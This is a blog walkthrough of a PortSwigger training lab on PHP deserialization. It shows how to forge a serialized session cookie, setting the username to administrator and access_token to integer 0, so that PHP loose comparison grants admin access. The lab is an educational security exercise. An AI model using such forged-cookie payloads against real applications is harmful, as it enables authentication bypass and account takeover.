PortSwigger Lab: Modifying serialized data types | WalkThrough

Introduction

Today in this post I am going to share my Walkthrough for PortSwigger Lab(Modifying serialized data types). The cookie used for creating session is php serialized . To become admin we are going to change the data type of access_token . PHP will effectively convert the entire string to an integer value based on the initial number. This will help us become admin and solve the lab.

Objective

This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos.

You can log in to your own account using the following credentials: wiener:peter

Detection

Login with the given credentials wiener:peter .

We can see our session has been created.

After decoding the cookie we can see php serialization . I have created php code which deserialize the cookie .

<?php$strng='O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"a7e4j477ehhln5monacatdqudq8wvp7e";}';$uns = unserialize($strng);
var_dump($uns);
?>

Exploitation

This works for any alphanumeric string that starts with a number. In this case, PHP will effectively convert the entire string to an integer value based on the initial number. The rest of the string is ignored completely. Therefore, 5 == "5 of something" is in practice treated as 5 == 5.

so we will change the username to administrator and access_token to an integer .

<?php$strng='O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}';$uns = unserialize($strng);
//var_dump($uns["access_token"]);
var_dump($uns);
?>

s:13 means a string of 13 char i.e administrator.

and i:0 means an integer i.e 0 here.

To learn more about php deseralization read this .

Encode the payload and paste it in session and go to /admin press Enter.

Now delete user carlos and solve this lab.

--

--

--

eJPT | eCPPT | DarkArmy CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Flutter : AppLifeCycleState Management

GitOps and IaC Security

Intro to (Progressive) Web Apps

Learning to Code: Day 4 — Introduction to CSS Part 1

Generating PDFs And Implementing Pagination Using xhtml2pdf In Django

Make Your Clients Happy - How we ensure quality in XR Applications/Games

Technical debt

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
WraithOP

WraithOP

eJPT | eCPPT | DarkArmy CTF Player

More from Medium

Stored XSS: A Wordpress Cross-Platform Exploit

Cross Site Scripting

Triggering Time Delays to Identify Blind SQL Injection Vulnerability

Kioptrix Level 3 — VulnHub

Bypassing File Upload Restriction with Magic Numbers